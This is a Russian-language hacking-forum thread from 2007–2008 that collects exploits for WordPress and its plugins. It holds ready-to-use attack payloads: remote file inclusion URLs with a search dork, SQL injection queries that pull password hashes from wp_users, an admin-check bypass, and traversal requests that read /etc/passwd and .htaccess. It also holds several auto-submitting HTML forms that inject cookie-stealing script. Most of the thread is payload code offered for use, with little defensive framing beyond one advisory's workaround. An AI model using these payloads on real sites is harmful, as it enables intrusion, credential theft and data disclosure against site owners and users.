Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.10.2007, 16:45
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Раскрытие Пути
Код:
http://[target]/[path]/wp-content/plugins/akismet/akismet.php
|
|
|
28.10.2007, 03:32
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
|
|
|
|
01.11.2007, 19:21
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Код:
#Author: S.W.A.T.
#cont@ct: svvateam@yahoo.com
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork:
"inurl:/plugins/BackUp"
Mirror:
http://www.milw0rm.com/exploits/4593
|
|
|
|
Sql Injection in wordpress 2.3.1 |
05.12.2007, 21:23
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Sql Injection in wordpress 2.3.1
Sql Injection in wordpress 2.3.1
Код:
Author : Beenu Arora
Mail : beenudel1986 (at) gmail (dot) com [email concealed]
Application : WordPress (2.3.1)
Homepage: http://wordpress.org/
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter : P
POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/*
Код:
http://www.securityfocus.com/archive/1/484608
|
|
|
|
11.12.2007, 20:29
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
|
|
|
|
WordPress Charset SQL Injection Vulnerability |
11.12.2007, 21:47
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
WordPress Charset SQL Injection Vulnerability
WordPress Charset SQL Injection Vulnerability
Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection.
( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html )
Exploit:
http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23
_http://ilia.ws/archives/103-mysql_real_escape_string-
versus-Prepared-Statements.html
Код:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=== WordPress Charset SQL Injection Vulnerability ===
Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc);
}
Finally, escape() method belongs to wp-includes/wp-db.php:
function escape($string) {
return addslashes( $string ); // Disable rest for now, causing problems
......
}
3. Proof of concept
a. After WordPress installation, modify wp-config.php to make sure
it uses certain character set for database connection (Big5 can
also be used):
define('DB_CHARSET', 'GBK');
b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
4. Workaround
Note: This vulnerability only exists for database queries performed
using certain character sets. For databases created in most other
character sets no remedy is needed.
a. It is recommended to convert WordPress database to use character sets not
vulnerable to such SQL exploit. One such charset is UTF-8, which does not
use backslash ('\') as part of character and it supports various languages.
b. Alternatively, edit WordPress theme to remove search capability.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org
iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----
Последний раз редактировалось Elekt; 02.05.2008 в 00:35..
|
|
|
|
Wordpress 2.3.1 - Broken Access Control is_admin() |
16.12.2007, 01:49
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Wordpress 2.3.1 - Broken Access Control is_admin()
Получение админских привелегий в обход пароля.
Как юзать: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63
Код:
By Michael Brooks
Vulnerability:Broken Access Control
Homepage:http://wordpress.org/download
Software: Wordpress
Version affected:2.3.1 (Latest at the time of writing)
The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.
This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted.
exploit:
htttp://localhost/wordpress/'wp-admin/
This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
htttp://localhost/wordpress/'wp-admin/
Vulnerable function:
line 34, in ./wp-includes/query.php.
function is_admin () {
global $wp_query;
return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}
The same flaw is duplicted in again on line 645 of the same file.
This url: htttp://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true. This flaw works regardless of register_globas or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.
Последний раз редактировалось Elekt; 13.06.2008 в 09:18..
|
|
|
|
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability |
25.12.2007, 21:45
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
Код:
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
$path = $_GET['path'];
$size = $_GET['size'];
$base = dirname(__FILE__) . "/..";
$cache = "$base/cache/$size/$path";
In Line 22 :
readfile($cache);
POC :
/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
# milw0rm.com [2007-12-05]
__________________
|
|
|
|
XSS in WP-ContactForm <= 2.0.7 |
25.12.2007, 21:52
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
XSS in WP-ContactForm <= 2.0.7
For attacking admin only (at options page):
1
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
2
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
3
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
4
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
=====
For attacking every user of the site (at contact page):
5
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</form>
</body>
</html>
======
For attacking every user of the site at contact page (and admin at options page):
6
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
7
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
======
For attacking every user of the site (at contact page):
8
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="test@test.test" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</form>
</body>
</html>
9
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</form>
</body>
</html>
__________________
Последний раз редактировалось +toxa+; 25.12.2007 в 21:55..
|
|
|
|
directory traversal vulnerabilities in WP 2.0.11(win only) |
03.01.2008, 16:43
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
directory traversal vulnerabilities in WP 2.0.11(win only)
PHP код:
function validate_file(..)
if (false !== strpos($file, ‘./’))
Код:
Proof of concept:
http://site/wp-admin/index.php?page=\..\..\.htaccess
__________________
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
